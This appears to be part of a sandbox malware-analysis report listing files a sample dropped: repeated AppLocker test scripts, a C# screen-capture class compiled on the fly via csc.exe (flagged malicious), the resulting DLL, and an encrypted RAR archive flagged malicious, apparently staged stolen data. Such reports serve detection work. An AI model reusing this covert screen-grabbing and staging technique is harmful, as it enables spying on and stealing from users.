Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32fx3nk0.o0r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4o2ghej1.huj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anrqpufl.4ns.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfaiddpd.cqy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgm3taru.s5r.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu0b3onz.is1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccxphkj3.s5b.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eum3f2ko.iob.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_frezhua0.c5r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtbjm2tn.qog.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmzpcbq2.aon.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ku0wesyx.ny4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nezm10uv.zen.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qer5twlf.oow.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwks3otn.lht.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tyzrnu2n.jk5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzaa4gwi.gzf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uw4riexh.zio.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrj1mnnn.mwi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xuzsrgzz.edp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yd0fsdb4.oea.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyfijbbe.ubz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1023073394712952
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQ02ak7Ynqqx0nPN5Dlq5J:+RI+ycuZhN+ZakSxuPNnqX
MD5:	974279E27BBE460754B17B004FF5D76F
SHA1:	F69B6C2A15020DEAD4A8595421139E38149B4F17
SHA-256:	8EE439173C321ECFF0B95B9C425644178F1963FC77A1C3D3E1E11957C4892D3F
SHA-512:	E2CA46D4722F0D5DC9FEAA53AC1E5ED8A12723068125DB6F6A7D204185C08458610237B852FCCCDDA34F15D22E655DC9378CCA6273EA9DA0B3E359DF9239E904
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.r.d.w.4.v.5.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.r.d.w.4.v.5.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
Category:	dropped
Size (bytes):	609
Entropy (8bit):	5.318107199001923
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5923fD:p37Lvkmb6KOkqe1xBkrk+ikq0pWZE20U
MD5:	89F28351AD507B234B30858694BD366C
SHA1:	DDED8F4262190F65C4FF1EEDF5C87248847B23B2
SHA-256:	62EA7E154F3FE0085E310FF92E4C64E345DE8AEE9E665CF99C417658803E12F9
SHA-512:	38F287E166B4AB1C3E666B6B2F93531F31EC5BF529581B92EC8AC734E0D711DB0B1F2B5D6B328C11E955B5FEE88867C371F630C134412A9BC051CA77EEEB92A7
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.0.cs"

C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.161174015959242
Encrypted:	false
SSDEEP:	48:677oEAtf0KhzBU/dwf6mtJ5N0IDpW1ulMa3Qq:1Nz0d/mBO+KK
MD5:	30E79574B713F4A26879755620494139
SHA1:	CB5AD0DA25AA29A69EC30A88D56FBEEBC906E444
SHA-256:	49FFFF75AC2679795CBFAA7EC7F4E8AF731067EBE8DBD6A2C4BAAF44F6C5ACAE
SHA-512:	E41085B6536D736AF8F1108AA6CA7A3891E43934A4522434CE4477C3AF9319DFC9AA7402BDE8E47C8198F9FACE44B228E2FE19BA7600DC8D14F918D46C6CE800
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.\|g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1150
Entropy (8bit):	5.489361946573571
Encrypted:	false
SSDEEP:	24:KLWtId3ka6KOkqeFkq9E2sKax5DqBVKVrdFAMBJTH:2Wtkka6NkqeFkq9E2sK2DcVKdBJj
MD5:	29306C6C81A093AF741B7BB96E990C5F
SHA1:	2633A9C14FE68ED758B1F8022BB77333CB860D29
SHA-256:	9A975D9E814CAF07157285BE2272309ABE0BD1FD93A66B984D8E21AF58572E4F
SHA-512:	D3F59E309A4F6FE69812C0815F5A8D3FE9DBA8D26AF9FB59012FC4EC5637A71CE06D9B4AD7F77F55B55C0359EB655B77EAA90345AA52D091D6BBE1E0C8FDC30D
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no long

C:\Users\user\AppData\Local\Temp\rEC04.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	755646
Entropy (8bit):	7.999786965092346
Encrypted:	true
SSDEEP:	12288:GflECq8tn1KWUXjI4sr+F/B9pUnqsF8P+NyuWDrj2SbSXxu9r2yt6E5CQM8ADsG:ql51LfADsSF/vsF8AW3Ex+2a6fDsG
MD5:	ABAC0FE9DEC427B2761FA69F5E5BDC17
SHA1:	51FAC5BC736F0DEE59D85DF0E160B8E1BD20C4D2
SHA-256:	6FB5E81A8A82C998E7F46CB456AE23EA8E5065A401C025DA15C849D729C36E45
SHA-512:	ADD413353132C0472ED582BA06C1A5596EA5B783449C3AABB2163D38FF4245DE9958EB4B7DE3A28A91C390D12AD06E1F43B784E94113B665D2FCAE7D083CEDF7
Malicious:	true
Preview:	Rar!........!......OA/.=&p%.....aV.."....o. !jk(e.....F9.e..\|0\|3.@.)F.KH?.[IZ.h..Jo.@....+E.<....y.Yv+.'.."hC}...._.......U.X...,~..;O...2QnS.r..>...R".1~!D.....H.+....}W.c........u....~&KC0.a._0..,...W............E...[.....eu1p.i.:6Sv.......$..38..ABm.k..o/.A.s .....J...!.c...A ..j.$S.m.......9..,.p..K..z..TB./R.$].B.VXn..).+.YCMW.oF..K.U.>EX.b.H3.:zy. ..,.2...\...u..].,......z..kP.1.s.%c....8\|X\.\|F~..[]..l.W_../..f.<.C;../.[.E..<.k...t...../..9\\|."+.G..-.YF.JW.D.{.<...c.Iw&S}.x..Y...Y.....(N..t.....\|.[...fjd#o'mc...Fl..._......%..2.r....\..N....0..j@..>.......^.^..+^h.24......SYWtz..@...:.~..s<..%...p"F\|X..V.C....R...u.....\.8...cs<..h..}"..ja...o./..rT..........m....[rG.*.9ct.n:.M2p7. w.......;((.6jKl..e..U........k.3z.).8..6.5.m..I.G.`..7.;.G..=FS4..?...]..E.`.....\....D.jw.....k.....-.UCO...1GZ..\......S..#....qL..@"..R..3.z.}..2.{.O:!.N...f...6P....e.j...&....8...,..H..b.L.n.,E)F.4.4_..".\6.~.....$..eQ.<..Qa......m.

\Device\ConDrv

Download File

